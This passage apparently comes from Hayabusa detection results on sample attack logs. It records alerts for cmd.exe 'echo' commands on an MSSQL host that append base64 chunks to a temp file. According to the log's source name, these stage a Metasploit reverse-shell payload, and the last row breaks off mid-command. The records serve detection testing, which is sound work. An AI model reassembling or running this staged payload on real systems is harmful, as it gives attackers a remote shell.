ABoa5xAAIsHUlDo97v//+mzNAAAg/gBdVcj+QZBADvCURxSaFABQRpqAegXDwAAg0AMo1AGQQCFwHRfi03ojVXsCdkvjVXT7D1qACPKoFX4999RCE30G/8j+YtNDPclG/ZXu/JWU2oBUf+w6ZH///8FLA+FkjcAAPZUBkEAp8J1vVIOQOlBM2oBLLgOAACDxAwZVAZBsoUQdaFqAWcVTMBIYohP3P8Xi30IiU1CiU30iU34OU3odGHFVRBS6Ogn1gAAXMTA61IWRfgzySzBdFqJR8WLRzkNAAABAC1HBItF9DvBdA6JRxSLRwQNANYC84lHD4xF8GrBzWOLtxBQrVfogT4AAIPEDOsPX164eBEBAFtP5V3Di30Ig57cCEEAMg+M7gEAAD5FELsAAgAAhUsPhAsBAACDOgwBD25pATmQi3UUhfam0V50BokAhcB1GVBoucNBaWoF6OkNAABNowyjdN1BAIVJVTtqBY1NxGogUYtNDNBV5JF3n9DHwA+LvgAAI4tF5IXAD9UgAAAAi/A3i1XEsUc0i+YEiVepC8PF0i0AAGoB/xVMwEAA69WLHUzA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:19.311 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 4gBqAP//3/4CfW6hYAbjAIXAdTlQaNcBQQBQlwQN+pWjYAZnAOsfg/4BwjehXBZYAIV7dQVQaPgAQQBQ6FMNqQCjXAbrAKplDIVodA6LVQyNFwhRUv/Qi/DrC2oB/9Mz9qYSOnUMg/7SdQr/FZjAQKqFwJoai00IM5ALxjPSiW4wi0cEZsqAzAKJTzSJygTRRwTvdRD30CzGX/f6G8Beg3gRAQDti+WSw5CQkJCQkJCQkAyQUYuji0V2UP/9TcBAADOpXcOQkZCQkJDgkJCQkIhokJBVi+yDYehTM8CwV4stDIlF7IlF8IvHM9slAEdAAIldW4ldCYld6IlFZHRNOR2EBkEAdUVohAZBAFNTU/RTcd9TjU30agFRiF1FyV31iOL2iF33iF34xsf5Af8VCMBAAIXAxQ+9gEZAAOg/GAAAg8QE6waJHYQG9AA9dQjjxwAAEAB0b/dG/wAAAQB0ZthIBtEAi1YmO7fHReq0AAAAibrJFh1TaIwBQQBqAVwRDAAAKMQMOwej2AbbAL9lhwAAlI1NDI1V4FGKTRBSUf/QRcOQIYtVDGoIUuhEAQDVi04Ig/EIC8iL8wQxAJMQAIlOCIlGBPfHAE4gAA8xgboAAPdG9QAAAgCjeItGFMdF7AIAAACJRfChCgYDADvDdRlTI9UBQQBqsuiWMQAAg8QMO8Oj6QZBAGcajU0MjVXgUYtNUFJR/9DrFGop/xVMwEAAkoGKAdQVIAQ2AOsEO8N/IYu3DGoEUui3AEsAi68IvMQIC8iLRgQNAAAgAIlOCNJGBDld/HRn/OsNquYQz6MV6zfl88G9Iej7AgAAkOsMxX/mP19+fnFSCPH6YInlMdLrDGSgW2TH0nU6re5o1WSLUjDrDPAgnuMi4SLv8nZxt4tSDJCLUhSQ6w8DqYDqQ+21l/u+T3oRnDDrDLxhTda/6H/b0M9po4tyKJDrDWK5NisF9U6iLwJT9woPt0om6wv+48qISP2Poipl+DH/kOsLdiE03/EqaUGzUwaQMcCQ6whggJyCIf/GaqyQPGGQfA+QLCCQ6wlFKUJfx9DR2YOQwc8N6wqIhGwkKJV7M2SSAcfrDxbCE5/MhOUzEEbXvXkhgUl1tpBSkOsIR2j7O96rtQ9XkOsK6OEZYZYtNIb5AYtSEJCLQjyQ6wtvHO6CtppXUZfrwgHQkItAeIXAkA+EtgEAAOsJvBHhi5cnz6vJAdDrD12ZWMG2rWEDmeWRyuaFWlCQi0gYi1ggkOsKWj6NjF2V6/wP7wHTkOsMxs4Ny3WWoZb9DEkykOsPUGhe0FYUivF+muOt2x/jhcmQD4RGAQAAkOsOvZ+yYJE+39wN+IDWXMhJizSLAdaQ6wtQFwEqgj9bn18lTzH/kOsKShDNuj3pWEjOv5DrDij9+3UKqbBF2wGyxXDuMcCQ6w4Cplr2VcWyhpYN5gTVkayQwc8NkOsOIhqtsOiPVxK+FrdCnvQB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:19.583 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo x+sIyJOqipK4o6w44A+Fsv///+sJVWXfDqpkc3LGA3346wkmy805CdaC7xk7fSTrCXoq/AyR3Z+p2g+FNv///5DpDQAAAEOAGPBCPwsOEOS4SPxYi1gkAdOQZosMS+kIAAAA4ZF6dTR1EKmLWByQAdPpDgAAADzr22+JJD6d2vOvQtJpiwSLkAHQkOkMAAAApjTuBCYQRood+3hYkIlEJCSQ6QsAAAB0lVBKaS++djGx3VtbkGGQWVqQUekIAAAA2kGuwS1Wa+X/4OkIAAAAZ4kDrCJTk4mQWJDpCQAAAPjvPDpX5tzz81+Q6Q8AAACEMdRbvwr7DZMyxev56uFaixKQ6WD9///pCQAAAPUlzX6HtN4PzF2Q6Q8AAABwuGpzUMvE5pad0q5uc5G+GwEAAOkIAAAAfoWOrSYS922Q6Q8AAAD+0GR7iAeQMW7un57/X4tqQGgAEAAAVpDpDQAAAAUQfxQtECQH+leljZ1qAGhYpFPlkP/VicPpCwAAABDRzwj7WJYUuekXiceJ8ZDo9QAAAJDpCQAAAJ3VijUXjciCwl6Q8qTpCAAAANEGnMe8MHFO6KEAAADpCAAAACZD37TiNo/ckLvgHSoKaKaVvZ2QieiQ/9CQPAbpDAAAABAGNsMwWSS98MHinQ+MRgAAAJDpDwAAAPT9Rhy9AGSJMBUnVhTH34D74JDpCAAAAGzD5M415AjID4UaAAAAu0cTcm+Q6Q8AAADbVWp20uhp2BJ/MI81JZhqAFPpDAAAAC2gRnCgjOhn04XwHP/V6QgAAAATIH2zFQozkDHAZP8wkGSJIJDpCwAAAEFMN7ar3r5mm3QR/9PpCQAAAHCGRysfPIS5B+k9////6BX////86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWItYJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWgzMgAAaHdzMl9UaEx3JgeJ6P/QuJABAAApxFRQaCmAawD/1WoBaAoXewtoAgARXInmUFBQUEBQQFBo6g/f4P/Vl2oQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGde7DgKJAAEiLAIvoDPj//13CBABADCGQkMGQkKacwgQAkJCQF4yQkCiokJBVi+yLOUmLrxSFQXQzi0257VD/FSrAQACFuXUe74uZmMBAABdqhcB1BV5dwggA/9a0gPwKAF5dwggAM8BdwggAuDtORgBdwggAkJCQkIyQkMOQ2L+QkMOQkJCQkJBFkJBViySDPUcIEABtfCNoKAdBUv8VQMBMAItFA2gxV0Bkjrpe>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:19.857 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo zgBohQecAFDoobH//zMMXcOQkJCQQ4+Q/JCQkLyQaCgHQez/FTzAQAAzwMOQkFWL7ItFCIvIgeEAAADAgfnLAADALgypAAD/P7gFAAAAdAW4xAAAql3DZpAXkJCQkKCL7EhFFFaIdXgZ2CjA09hIUDHMFFD/FZzAnwAj14lFFEVLi6Y1qU0RUVL/FSTAQIqFwHRKi6oMi00UhcB0AokIi1XAhdJ0C1Hogv///4PEpokCi5YUUP8V/cBAv8exFNq0AHO4dREBAKBdwhAAZgJz1wBaCrh2EQEAXiXCEHEkNZjAQF8s1oXAdQVeXcIQAP/WBYD8CgBeZcIaAJCQkAkL9uyLTRCLRQiFyVZ0HI10CP87xnMRi1UMigqEyegIdAlAXDvGcvLGAJReXcLLAJBViyNTIdyowXIAVleLgQhqL1f/02pcV4vw/9ODxBA7xnbVi/CMMHUO3zpX/9Mu8IOjCIUDdAqNRgFMXltdwgS0i8dfXvFdwgQAkKaQkNBJkFVSMoPsGCyLXRCF21f5QfwAAAAAfROLRQwz24PuALcJi0yYBM6FyXX3jQSdBAAAAFZQ/xVcwUAAncQEi/j124l99H5Ei0UMwiArxxVd+IkwEOsDC0V3iykwUf9JicFAAIPEBECJBotV/APQi0X4gsYESInJ/IlF+ETZzUX8jURAAaWJRfzKnlztQOaixAQzyYXbiUUNi/B+VPhFDBxN9CvBi03IiUX0iekMeV2N6wOLRQB41fJN7I1N/IlV8Ik3iwQHUY1V8J9SqehZBQAAi038i0V1K8GDxwQD8ItFDEiJRQyz5ot99FVNrItF+McEjwUAjSbG/QAr8AN3UP8VIMFAQHpN+IPE/TsAD/AxK8GL10k0att+NosUhwNrshSHq2jD/fOLTQgSbIk5X1uL5V3Di1XyHsOJOl9biytdw4tFCIk4oMOiW8blucNkkJCQYFWL7KHc3UUAVpzAVw+F6QEA/2j4B0EAxwX4B0GelAAAAP8VIMBAAKH0CEEAg/gCD4W0AQAAoAwIQQC+kXxYADAbdDuLPUDBQAChdMFAAIM4RX4OM8mK4IoOUf/Xw44I6xGheMFA4zPSihaLCIoEUYPgEdvAdTaKRgHrhMB1y4sNtwgEAKH8tEEAg/ihD4JfAQAuD4RZARIAgwoEdWWD+VZzI7goAAA/6UoBAACAPgB0zVb/FajBQMqLyIPE7YkN4AgFAOu/d9u4rwAbAOklAQAAgPkDdze4K2YAAOm7AQAAg/kEdwq4LEQAAOkHATYAuiIAAL3C0RvAwGODwC3p9AAAlYP4BXVVoZzIQQCFwHUeqcl1/rgyAOAAA9gAAAAzwAf5Wg+VwINDM+nIE6QAg/gCegpNBwDdAOlyAAAAg/kBxAp6PFkAAOmqAAAAM8CD+YyhlRiDwD3pmgBfAIOXXPfYG8Ak9oM0UEqJQwAAg/gBdX+jjtb/AL52CFsAhMB0O4s9aMFA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:20.131 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo omN0wUAAzTgBfrkzyWoBig5R/wGDxAjrEaF4wUAAM9LNFhMIKgRRg+D9hcDCCIpG7EbEwITLoQAIQQCh+ApzEIoOM8CA+UMPncCNRAA34iGD+FoMEIoOM7WA+UEPncCNRDAO6wy4c3oAAOsFuAEAAACj3AhB34tVCJ2JAtU13AhBnzPAg/4BD53ASIclLk4AAF3DkJCWkJCQkJBVi+yLRQhWiwyF5AhBAA40heQIQQCFMW8XiwQcVMRAAFD/FRjAQACFwOsGdQNeqsOLkB6FwHQNiw5QUf8VHARAAF5dw4suDIsGUlBwFRzAQABeXcOQkM2QkJAMTpA7kJBVpuyD7OVTSdKLVqWLF/XSiVX4dQ5f6jPAmIuEXcIQAN5V+ItNFIM5cmDqi9pSM8CKBpGEwIl1CDMZBombixFGiRGLPBBmiTeDwQL6TRC0yAEAAIvIgeHABwAAgPmnD5yHoAAAmb/gJQAAvsiJVfAjz4Pbvp8AAAAz0jvPiXQEiVPsdTQ7PGkwi8dk07kBAAAA6NoNAAAL+AvaRoP+JQ91/NdIi0XsiwjwJccjyzvHdQQ7y3SFi0Xsi1Xwi8vP0YvrI0yLVfz31iPwjUIBiUX0UVH4hnEPhp0BOgC++gHzEnWzg0MeM//nx69nX164FgAAAFuLfgXCEAALgHUet0DHD6SVjIoC//+JKYz/AAAA9MQrI9OHzHTTiwblU/oCdRGD/g1WLW3JdSmYZAj2ACDrH4P6A3Uchcl/kXwFg/4E66qD/i11DIXJdQiLRcH2ADAfmal9FLgCAABvO8KLHxvA99hAO9gPgqr+//+F0nQ/iz8I6wOLVfyEJUo0B4lV6rgCgeLApwAAR4D6gIl9CA8hV///dg+k8QaD4D+ZweYG6WYLriTwi5z8hcCLyuXGEEWSR1X0K8JWMwyzyU8Cfxd8CIH+AAABAHMNvUUUixBKiRCLRRDrPItFFIsCFMP+gcYAAP//g9GSiRiL0YvGuQoAcszoeQwAAGaLyItFEBLN2IHm/wPLymaJCIPAAuPOANwAP2aJwbfAAh5FEIt9DLsHhcCJRfgPhfX9//9fl1uL5V3CEBNfXrh4AgEAW4vlXcJwAJCQkMKQkJDtkJAQrpD+VZzsg+wIi1XQU1ZXizqF/4m6/HUOxV4zwFvJ5V3CEL7EffyLRRSDmwAeNpd1CDPJZosOg8YCgfn/AAAAiXUIfRZPRc9lME6JA/ZFWIgIQIlFEOlJ5gAAi8Elz/wAAD0AgAAALIQeAQAAPQDYAAB1RoP/Ag+C/gAAAGaLBovQgUwA/AAAgfoAMQAAD4X1AADEgeH/AwAAJRIDAADB4QoLwYPGCJmLc4v6gcMAlwEAiXUIg7AA6weLwZnG2Iv6i8OL17kLAAAA6FULFQAIyL4BAAATC8p0EbkFAAAA6EALAACLyEYLynXvi1UUOzIPg8D//7y4AgAAO4tVDDvG3/b8G8n32W3Bg03/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:20.404 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo SBK5iQKLRdCLEBL7phCLeBCF9o1MMgHmgAAAAImNEHQwi8fR+u3CCYlF2YrDJD+JTdeSFQTXiAGLw7kGsGUAnNS+AMOLTfiL2ItF/E6L+nXQi1UMCtiIWf/+AoUuiUX8D4Wy/v//X6pbi+Vd0hAAX164eBEBAFtF5V3CPAB0kbgWAHEAW4vlXZoQAJCQkJCQkBWQ7Y+QgJBV5OyL3giD6ETkEP+zDDVAAMcAsScAADPAXcN9RRSLTRAvVVBQUVJMFFcAAIPEDF3DkJCQkJCQkJCQkJCQkJCQus/s3UUQi00Mg+0QcxD/kXjBQADHeBwAswAzwP3DU1ZbdQhXvwQAawCKFkY8Y4hFEHYai0UQu2QAUQAlCgCkAJn3+wQwiLwQiAFB6wQ8REMXi0UQuwoAAAA1/wBwAJn3+wQwiAFBisIEMIgBycYBLkFPdbWLRQxfXsZBvBZbXcNVi+yD7AwJSYt1d1eDPgB3EYsGAAAAAIzPM8Bbi+VdwgwAi10Ii0MY9sQCdGV/QwyFWXXpiwNqFFAV/+jQm2n/i0+JOIB4BInTCIkE81dXNol4IFeJvFf/FaDA1wCLUwyJ0mHiQwyLSMqFyXUlizW0wLxj/9aFwHUJX15bi+VdwgwA/9ZfwgCA/AoAW4vlhcIMAOpDMIOfMDvHi0UMdCiKmDCICIsWQEqJFol7MIsOiUUMhcl1Ecf9ActRAF9eM8Bbi+VdwgyqikssVzcPhDUBAACLU1iLPlKJ3EuJ5/jonaJ2/4PbSAF1LVOBkQNrADPJiUUIOxh0T4tDWFDomPP//4tFCF9eW4vlXcIMAIlLPIlLSIlLRMdFCAAAAFR8A4t9+IX/GIadAHgA4Us8OkNEO8hyN4tDQItLOO5VGlIgUfXo6gAAAItNzzuXB8QQO/iJRQh0ZFX4UItDVAPxiUtEE8KJc1CJ2FQEUzyLU4SLQ0Q4wjn4dwKLoouBOKdE/ET4A/LUSMHpAodTi8qPVfyD4QMD3fOkAHMsdE34bPAryItFCIlbdyZ1EPpVpoWmiWH4D4S8////Ew49JxEBADBnx0PNAdsAWHFF/ItNDK3BiQbsB8dFCAAnAACLQ1iUbQ3z//8XRQhfBFvD5V02XQCLFitNDFFSUGjoMwAAAIMkED1+EQF4iUUIVQfHQygBPwAAi0UmX4kGi0UIXluL5V3CDACVkJCQ8pCQC/+QkJCQkFUQGIuLyggci30Qi0YQi04UC8HHRRIAAAAAdXOKRgiE7HTVi1YEjSgIagBRagBqAGoA3v8VDMBAAB3GdTWLNZjAQAD/mIXAdQmLTRRfXg9CvcP/1gWA/AoAPe12TgBrBbh+PgGAi5QUX16QAQCsABdd6IvqCIXAdQ6LLhRfXokCuAtmAABdw+T4dgJm+ItGDIVDdCOKTgiZyXUci05QiUgIi0ZQi70nuSAAAADo3wbOAItWDImS2PBGDBPwDFONTRBQi0Y/UVeRUP8V>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:20.678 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo EMBAS/vAjAczwPeJAQAAiz2YwEAAutdAfg+EG9oAAGLXBYD8CgA9ZQALAA+F/QCfAIsdnMBAAItOJYtGEIX4fBZ/HYXAdhBqABHoAwAAUc5w8AM3AOsNI8GD+P912wtf6wK1wIvSyLSLUaBS/9OLxoH/gAAAAOq/hf+4MaGECUEAi14EmsB1GFBo7ABBAC5AYRb//zHE96Ng1/oAhcB0BVP/0OtlaoGRKd43sgCLTgyDVgSNlxBqcYVR/98VksBA2cHA1QQzwOtxix2YwEAAWNOFwHRl/9OUKfwKAD1kAH35dAc9YwAhAOEsgf8CAQAAdRKLTRSLVRBOX7g8EQEAieZeXcM97fwKAJ0Si03qi1UQ7V/28xEBALIRCF3DPaZbCgD4EvpNFIsnEFtfuH4RATyJEV5dw4XAdTiLTRCFyXUSi00Uiw8QW1+4fugBAIkRJ13Di1YMhdJ0GIp1CIRodRF2VlADV4tOVH/Ren1xUIlOVAFNJYtVEFtfiRFe+TuQkJCQkJBVpexRVovtzoqELITAD4RCAAAAzE7RM8BTg/kB54lF/IlF/w+lnAAAAIvUPOX4D4SROAAA214zg///dgXPyP/rAgpLi1bwjU38agBRUFNS/xUUwEAAhcB0L4uL/ItWUItOVPfQg9EAK/gD2IlWUIX/iU5Ud8IXtAhfx0Y8AAAGsFueG+VdwgQAiz2YwEAA/9eFwHUFiUUI6wqf1wWAJAoAiUUIREX8i1ZQi/FUFtCLRQiJiFCD0QCFwPBOVHUHx+DZAABLAItFCF9bIYtrXcIEgTPAXovlmsIhB0wbkJCQkFWLoItFCI1IArhWVVVB9+mLysHpHwPRjQSVAQDfAF3CBACQkJCQDdg64JCQkCGQkFWLJItFEItNDIsdCChRUugMAAAAB8IMHZCQtpCQ0pCQVYuui1UQiUUIHFaNSv4z9leLfQyFyX5rStIzXwgUN4PGA8HqAkCK94/NQOWwUP+0njf9amQ3/oPiYtbiusHrCsDTM9tAipLex6oAoFBXihA3/opcN/+D4g/B4gIRDQbF00CEkhhpxs+IUP+KVDf/g+I/QDvxipIYxzYAiFD/fJgb+xc78n1fM8mKDD7B6QI7SoqJGMdAADvyiP3/DRQ+dXaD6APB4gRAincZ/kAAiDD/xgA96yu87j4BM9uD4gOKGcHiBMHrBAtvJYr0rMdAAIhQ/4oJg+EPihSNGMdAAIgQQBkAt0CLVeX/AAArwpdez1tdwgwAkDI4kJCQkJCQT4M9WEBBAP8pDP90JAT/a/jAQDlZw2hL/UEAplhUQQBAdCQM6JcDAABxxAzD/3Qk/qHL////99gbwFn3m0gsnMyLRCQIi0wkEAtLfnskDHUJi2IkBPfhwhAAU/fhi9iLRCQI92QkrgOEi0kkEffhA83PwhAAzMxkzMzMzMzMzMzM/yVAwUAAzIDMzMzMzOPMzFf1U63/i0TaFAvEfUVH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:20.951 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo i1QkEJLY99oV2OOJZyQUiVQkOrxEJBwLwH0Ufr50JBj32Pfag9gAiUQkHIlnJBgLwHUYi0y5GIsFJJgz0veIi9gqRCR09zOLs3FBie2LTCR+i0EkFC6yJCXR614h0dvR2AvbdfT38Yvw92QkoovIi0QkGPfmA9ELDjtUJBR30HIHO0R3+HYBTjPSi79PjQf32vdGHdoAW15fwhAAVYvsav9oYMf8AChIuUAAd6EAAAAAUGSJJQAAAADlGiBTVleJZeiD6zgAagH/FdCrQN1+BQ1UQFwAlYMNWEBBAP+3FdTAQH6LDZgLQQCJCP8V2MBAAIsNSAtBAIkIodwOQACLAKMlQEEA6J/nAACDMVANQQAAdQyJ1LlAAP8V4MBCAFnocAKTAGgMhUAARyHQbgDoWwIAAKGQXV4AiUXYjR7YUP81jAtBAI1F4FCNRdSDjUXke/+f6MBAMWjr0EAAaABf/OvoWgIAAP8VzcBAAIth4Ilm/3Xg/3XU/3Xk6ONYk9NBxDCpRdxQ/5S4wUAAi0Xsi1yLCYlN0FBR6OsBlwDHWQOLZej/ddD/FfTAQADMhczMzN3HVzMyi0SIEAvASBRIi+EkYffY99qD2ACJRCQQiXUkmpVEJBgLwH0TUVQkFNnY99qD2AArRCQYiVQkFAtedfaLTMoUi0QkEOXa9/ELRCQM9/GdnzPST3lO61OL2ItMJBSLVCQGi0QkDNGj0dnRc9HYC9t19Pfxi8j3ZCQYkfdkvBQDxsMOO1QkWXcIcr47RCQMdv/BRHwUm1ReGCsKdgwbVCQQT3kH94T32IPagNlbwhAAzMzMzMzMIKigzMwtzMyAp0BvFoD5a3MGD6/Q0/obi0XBSYSA4RXT+MPB+h+LwtPMzMzMzMzMzMzMzMxF28xRPQAQAACNOyTochSB6QCkADQtABAwlNF5PQAQAABz7CvIi7KF14vhiwiLrgRQXcyAbkBzFYD5IHMGD8fCbTPDhtAzwIDh0NPiwzPAM9LDzFNWi8UkGAtidRiLTAgUi0QkEDrS98qL2M5EJAz38YvT67aLyFBcJBSLVCQQi0QkDNPp0dvR6tF9C8l19PfzA/D3ZCQYi8iLRCQUouYD0XIOO7WgzXcIcgc7RCQMdgFOPtKLxuNbwhAAzB/MzHPMzMyA+UBzFYD5oHMGDzXQ03PDiw7O0oBBH9NPwzPAM9LDzP8l/MBAAP8l8MBAAP9k5MBAAGgAAANNaAAMAR1tDQAASVmZdDPAw8P/Jcy+WQD/JYTB8gDMzMzMzMjMzMzMzMz/0szBQM8AAAAAAEMAAEIAAAAINAAAANEAAMcAAD4AAAAAAAAAPwAAAOUAfQAAACmdAAAAAJQ4xQAAAP0AKwAAAAAAAACXAAAAAACYAABMAAAAcgAAAAAAAAAAAAAAABIAAAAAAAAAAAAAAAAAAAAUAAAA7QC1AAAAYVEcAAAAewAAAAAAtgAAAPoAAAARAABN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:21.224 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAA9gAAeAAAAAAAAAAAAAAAAAAAAAC87QAAAAAA7wAAAAAAAAAAAAAAAAAAAAAAAAAAAI8AAAAAAAAAAAAAAAAAAL4AAAAhAAAAAAC7ADAAAAAANAAAAAAAqAAAAAAA+wAAACMAAAA9AAAAAAB3AAAAAAAAAAAAACwAAADRB6EAAAAAAAAAqwAA7OGiAAAAAAAAAAAAAAAAAOMAAAAAAAAAAAAAAAAAAAAAAFEAAABqAAAAfwC7AAAAAAAAAAAAAAAAAAAAM2cAAOkAAAAAXQAAAADvAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAALQAAAAAAAAAAAADNAAAAAAAAAAAAAAAAAAAhAAAAAG9eAAAAGQAAAAAAAAAgACsAAAAAARoAAAAAfAAAAEo6AAAAAEW+AH8AAAAAAADcAACFAAAAAAAAAAAAAADsAAAAdwAAAAAAAADuNgAAqgAAAAAAAAAAAHAAAMOHVWQAZmEAAAAAAAApALAAAD/8AAAAAADaAAAAAIQAAAAAaAAAAAAAAAAAAAAATQAAAAAAANdHAAAAiQDCAAAAAAAAAAAAAAAAAOkqAACBAAAAAMEAAAAAAAAAAAAAAAAAAAAAoAAAAABEAAAAAACAYTAAAAAAAAAAAAAA8ADDqtUAAAAAAAAATQAAAD8AAAAAAAAAAADUAAAAAAAAAPIAAAAAAADo4wAAAKQAAAAAAAAAACiYAAAA9osALQAAAAAAALYAAAAAAOEAAADjLwAaAAAAAAAAAI0AAAANAP4AAAAAAPthAAAAswBjAAAAVwAAAAAAAAAAAAAAAAAAAAAAALoAAAD5AABKAAAAAABsAAAAAAAAAAAAAAAAAADyAAAAAAAAAAAAvQAAAAAAAF4AAAAAAAAAAAAAzQAAAAAqAAAAXAB2owAAAAAAAABHugDXAAAAAAAXAAAATAAJKwAAAABuAPAAhgAAAACpvQAAAPiAAAAAAAAArgAAAAAAAADbAAAAALsAAOUAAAAAAHIAAAAAAJIAAAAAAt4AoQDuAFUAAAAAAAAA+QDoAAAAAAAAiQBLAAAAIwAAMAAAAAAAAEAVAOwAAADpAAAADCsAAOkAAAAAAAAAAAAAAADGAAAAAAAAaAAAAAAAAFkAAAAAAADsAAAAExIAAAAAAK0AAAAAAAAAAAAoAAAAcTkAAACyAABgAMIAADcAAAB3AAAAAAAAADYAAAAAAAAAAAAAAIxUYVgAAAAAAAAAAAAAAACtAAAAAAAAAADNAGoAAAAAAAAAAAAAAABtAFgAAAAAAAAAAAAAAAAAAAAPAG0AAABUAAAAAAAAAAAAAAAAAAAAQwAAAAAAAAAAAAAAAAAPAAAA4QCfAAAAAAAAAACBAAAAUAAAAAAAAAAAAAAAAAAAAPMA/gCRAAAAAgAAALaYNwCQAAAAGgAAW6QAPF0AAAAAAAAAAAAAAAAAAMEAWJIAABwAAABs>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:21.498 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 